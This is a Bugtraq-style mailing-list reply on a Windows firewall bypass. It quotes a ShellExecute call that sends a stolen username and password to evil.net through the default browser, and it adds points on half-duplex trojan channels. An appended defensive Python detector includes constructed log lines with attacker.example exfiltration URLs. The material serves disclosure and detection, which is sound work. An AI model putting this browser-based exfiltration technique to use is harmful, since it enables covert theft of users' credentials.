While I was being interviewed for an InfoSecurityMag.com article on this (in
which the author unfortunately got multiple fundamental facts wrong), I
thought of a couple of other points that are probably worth mentioning.

<aceh@gyuvetch.bg> writes:
> Windows dll shell32.dll exports a well-known and documented function called
> ShellExecute. From Win32 Programmer's reference:
>
> >HINSTANCE ShellExecute(
> >  HWND hwnd,             // handle to parent window
> >  LPCTSTR lpOperation,   // pointer to string that specifies
> >                         // operation to perform
> >  LPCTSTR lpFile,        // pointer to filename or folder name string
> >  LPCTSTR lpParameters,  // pointer to string that specifies
> >                         // executable-file parameters
> >  LPCTSTR lpDirectory,   // pointer to string that specifies default
> >                         // directory
> >  INT nShowCmd           // whether file is shown when opened
> >);
>
> When the lpFile parameter is an Internet URL, Windows invokes Internet
> Explorer (or more accurately - the default web browser), which in 99% of
> the cases is allowed to access Internet, with that URL. Example:
>
> ShellExecute(
>     0,
>     "open",
>     "http://evil.net/collect.cgiun=stolen_username&pw=stollen_password",
>     0,
>     0,
>     SW_HIDE  // This doesn't work.
>              // I think it is supposed to hide the window but ...
> );

The level of detail you're going into on ShellExecute() kind of implies the
vulnerability is limited to that one system call, but of course a malicious
executable could directly run iexplore.exe or any other executable that
allows opening arbitrary URLs, and pass those URLs via the command line or
via other means like DDE.

> The info leaked is limited by the maximum allowed URL length, but that
> could be more than enough for a malicious application to send some
> username/password/cookie/cc_number info to malicious server.

And the vulnerability wouldn't be limited to simplex communications from
host to server. The trojan could employ techniques (as simple as reading
Internet Explorer cache files) to establish half-duplex communications,
potentially allowing an attacker to gain remote control over your machine
despite the presence of ZoneAlarm.

Of course if a trojan is able to run arbitrary commands with your user
privileges (especially if you're in the Administrators group, as, for
instance, the initial account created on Windows XP boxes is), there are
other ways an attacker could gain control of your machine. Particularly if
you're running only ZoneAlarm rather than ZoneAlarm Plus or Pro, since it
doesn't notice DLLs getting changed.

--
Dan Harkless
bugtraq@harkless.org
http://harkless.org/dan/
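The thread's point is that a per-application firewall rule on the browser tells you nothing about which program handed the browser its URL. From a defender's side, the observable is the process-creation event: a browser started by a non-browser parent with a URL on its command line. The script below is an added example written for this page (not code from either poster) that runs that check over a few constructed process-creation records. The record format is a simplified pipe-separated line with the field names ParentImage, Image and CommandLine as Sysmon's process-creation event uses them; the log lines, the domain names, the browser and "benign parent" lists and the parameter-name list are all assumptions to tune per environment.

```python
"""Flag browser launches that look like a local program using the browser
as a firewall-bypassing exfiltration channel.

Indicators, in the spirit of the thread: the browser's parent process is not
itself a browser or a known link-opening application, and the URL on the
command line carries an unusually long query string or parameters named like
credentials. The log records below are constructed for this example.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Assumed lists; adjust for the environment being monitored.
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe", "msedge.exe"}
BENIGN_PARENTS = {"explorer.exe", "outlook.exe"}  # open links legitimately all day
SENSITIVE_KEYS = {"un", "user", "username", "pw", "pass", "password",
                  "cookie", "cc", "card", "token"}
MAX_QUERY_LEN = 256  # bytes; a query longer than this gets a closer look

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed sample records (one per line), not real telemetry.
CONSTRUCTED_LOG = "\n".join([
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Program Files\Internet Explorer\iexplore.exe"
    r'|CommandLine="iexplore.exe" http://example.com/',
    r"ParentImage=C:\Users\dan\Downloads\freegame.exe|Image=C:\Program Files\Internet Explorer\iexplore.exe"
    r'|CommandLine="iexplore.exe" http://attacker.example/collect.cgi?un=stolen_username&pw=stolen_password',
    r"ParentImage=C:\Users\dan\Downloads\freegame.exe|Image=C:\Program Files\Internet Explorer\iexplore.exe"
    r'|CommandLine="iexplore.exe" http://attacker.example/c?d=' + "A" * 300,
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\notepad.exe|CommandLine=notepad.exe readme.txt",
])


def parse_record(line):
    """Split 'Key=Value|Key=Value' into a dict; values may contain '='."""
    fields = {}
    for part in line.rstrip("\n").split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(record):
    """Return the reasons this record deserves attention; empty list if none.

    Only browser launches from an unexpected parent are considered, and
    only those whose command line actually carries a URL.
    """
    image = basename(record.get("Image", ""))
    parent = basename(record.get("ParentImage", ""))
    if image not in BROWSERS or parent in BROWSERS or parent in BENIGN_PARENTS:
        return []
    match = URL_RE.search(record.get("CommandLine", ""))
    if not match:
        return []
    url = match.group(0).strip('"')
    query = urlsplit(url).query
    reasons = [f"browser {image} launched by non-browser parent {parent}"]
    if len(query) > MAX_QUERY_LEN:
        reasons.append(f"query string is {len(query)} bytes")
    keys = {k.lower() for k, _ in parse_qsl(query, keep_blank_values=True)}
    hits = sorted(keys & SENSITIVE_KEYS)
    if hits:
        reasons.append("credential-like parameters: " + ", ".join(hits))
    return reasons


def scan(log_text):
    """Return [(record, reasons)] for every record that trips the check."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        record = parse_record(line)
        reasons = assess(record)
        if reasons:
            findings.append((record, reasons))
    return findings


if __name__ == "__main__":
    for record, reasons in scan(CONSTRUCTED_LOG):
        print(record["CommandLine"][:80])
        for reason in reasons:
            print("   -", reason)
```

The parent-process check is the part that matters; the query-string heuristics only rank the findings, since a program can just as well encode data into the path or a hostname where neither test fires. A first-seen-parent baseline (any executable that has never launched the browser before) is the usual way to keep the rule useful without the two content heuristics.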